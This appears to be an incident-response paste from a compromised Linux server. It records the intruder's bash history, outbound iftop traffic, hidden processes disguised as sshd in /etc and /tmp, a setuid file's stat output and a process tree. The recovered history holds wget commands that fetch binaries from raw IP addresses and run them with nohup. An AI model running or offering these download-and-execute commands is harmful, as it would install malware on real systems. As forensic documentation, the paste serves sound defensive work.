Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1.history 记录
- 1 passwd
- 2 wget http://183.56.168.220:8080/TSmww
- 3 chmod 0755 /root/TSmww
- 4 nohup /root/TSmww > /dev/null 2>&1 &
- 5 ifconfig
- 6 chmod 0755 /root/TSmww
- 7 nohup /root/TSmww > /dev/null 2>&1 &
- 8 chmod 0755 /root/TSmww
- 9 nohup /root/TSmww > /dev/null 2>&1 &
- 10 wget http://183.60.202.61:8082/ymso
- 11 chmod 0755 ymso
- 12 ./ymso &
- 13 chmod 0755 ymso
- 14 ./ymso &
- 2.查看文件
- root@140322in04:~# ls -l
- total 1120
- -rw-r--r-- 1 root root 69 Aug 26 03:14 conf.n
- -rwxr-xr-x 1 root root 1135000 Aug 19 18:41 ymso
- 3.web登录页面后台记录
- 没有异常
- 4.iftop流量分析
- 140322in04 => 110.50.234.209 511kb 540kb 540kb
- <= 22.2kb 22.3kb 22.3kb
- 140322in04 => 110.50.237.157 511kb 539kb 539kb
- <= 22.2kb 22.2kb 22.2kb
- 140322in04 => 114.141.73.125 503kb 537kb 537kb
- <= 21.3kb 21.5kb 21.5kb
- 140322in04 => 110.50.234.201 508kb 537kb 537kb
- <= 19.4kb 20.1kb 20.1kb
- 140322in04 => 110.50.234.210 507kb 536kb 536kb
- <= 18.6kb 19.2kb 19.2kb
- 140322in04 => 110.50.227.153 502kb 533kb 533kb
- <= 16.3kb 17.2kb 17.2kb
- 140322in04 => 110.50.230.44 497kb 525kb 525kb
- <= 7.56kb 6.88kb 6.88kb
- 140322in04 => 110.50.230.55 496kb 525kb 525kb
- <= 6.36kb 5.61kb 5.61kb
- 140322in04 => 110.50.230.39 493kb 522kb 522kb
- <= 7.05kb 5.67kb 5.67kb
- 140322in04 => 110.50.230.21 445kb 470kb 470kb
- <= 5.84kb 5.21kb 5.21kb
- 140322in04 => 110.50.230.30 43.3kb 51.7kb 51.7kb
- <= 0b 0b 0b
- 140322in04 => 107.150.42.203 3.52kb 3.83kb 3.83kb
- <= 2.34kb 2.55kb 2.55kb
- 140322in04 => ec2-54-215-6-163.us-west-1.compute.amazonaws.com 5.91kb 5.42kb 5.42kb
- <= 416b 347b 347b
- 140322in04 => google-public-dns-a.google.com 0b 1.60kb 1.60kb
- <= 0b 3.09kb 3.09kb
- 4.可疑的进程:
- root 16533 0.0 1.0 1018648 2640 ? Ss Aug22 0:00 /etc/nhgbhhj
- root 17324 0.0 1.0 1018648 2640 ? S Aug22 0:05 /etc/nhgbhhj
- root 17326 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
- root 17327 0.0 1.0 1018648 2640 ? S Aug22 0:54 /etc/nhgbhhj
- root 17328 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
- root 17329 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
- root 17330 0.0 1.0 1018648 2640 ? S Aug22 0:07 /etc/nhgbhhj
- root 17331 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
- root 17332 0.0 1.0 1018648 2640 ? S Aug22 1:06 /etc/nhgbhhj
- root 15979 0.0 0.2 9180 564 ? Ss 07:05 0:00 /tmp/.sshdd1409051099
- root 3766 0.0 0.0 980 128 ? Ss Aug22 0:38 /etc/.SSHH2
- root 3803 0.0 0.0 980 156 ? Ss Aug22 0:37 /etc/.SSH2
- root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:16 /tmp/smarvtd
- root 19122 0.2 0.6 431804 1832 ? Ssl Aug25 2:18 /tmp/gdmorpen
- root 2372 0.4 0.3 105924 1024 ? Ssl 06:41 0:08 /tmp/sfewfesfs
- root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:16 /tmp/smarvtd
- root 19092 0.2 0.6 431804 1828 ? Ssl Aug25 2:08 /etc/gdmorpen
- root 19120 0.2 0.6 431804 1824 ? Ssl Aug25 2:08 /etc/smarvtd
- root 19121 0.2 0.6 431804 1828 ? Ssl Aug25 2:14 /etc/whitptabil
- root 19122 0.2 0.6 431804 1832 ? Ssl Aug25 2:15 /tmp/gdmorpen
- root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:14 /tmp/smarvtd
- root 19560 0.1 0.4 109128 1084 ? Ssl Aug25 1:50 /etc/sfewfesf
- root 2869 0.0 0.2 11716 544 ? Ssl 06:41 0:00 /usr/bin/.sshd
- 5.stat 查询文件
- root@140322in04:/run# ls -l /etc/gdmorpen
- -rwsrwsrwt 1 root root 487672 Jul 28 03:58 /etc/gdmorpen
- root@140322in04:/run# stat /etc/gdmorpen
- File: ‘/etc/gdmorpen’
- Size: 487672 Blocks: 968 IO Block: 4096 regular file
- Device: 917bh/37243d Inode: 75497505 Links: 1
- Access: (7777/-rwsrwsrwt) Uid: ( 0/ root) Gid: ( 0/ root)
- Access: 2014-08-25 14:40:57.000000000 -0400
- Modify: 2014-07-28 03:58:15.000000000 -0400
- Change: 2014-08-25 14:40:54.000000000 -0400
- Birth: -
- 6.杀死很多/etc/ /tmp程序后,pstree列表
- init─┬─.SSH2───sh───ps───sh───ps
- ├─.SSHH2───sh
- ├─.sshdd140905177───.sshdd140905177─┬─.sshdd140905177───sh───ps───ps
- │ └─3*[.sshdd140905177]
- ├─.sshhdd14087083───.sshhdd14087083─┬─4*[.sshhdd14087083]
- │ └─2*[.sshhdd14087083───sh]
- ├─.sshhdd14087083───.sshhdd14087083─┬─7*[.sshhdd14087083]
- │ ├─.sshhdd14087083───sh
- │ └─.sshhdd14087083───2*[sh]
- ├─agent───7*[{agent}]
- ├─cron
- ├─2*[getty]
- ├─getty───8*[{getty}]
- ├─kthreadd/662───khelper/662
- ├─master─┬─pickup
- │ ├─qmgr
- │ └─tlsmgr
- ├─rsyslogd───2*[{rsyslogd}]
- ├─saslauthd───saslauthd
- ├─screen───bash
- ├─sshd───sshd───bash───pstree
- ├─systemd-udevd
- ├─upstart-file-br
- ├─upstart-socket-
- ├─upstart-udev-br
- ├─whitptabil───42*[{whitptabil}]
- └─xinetd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement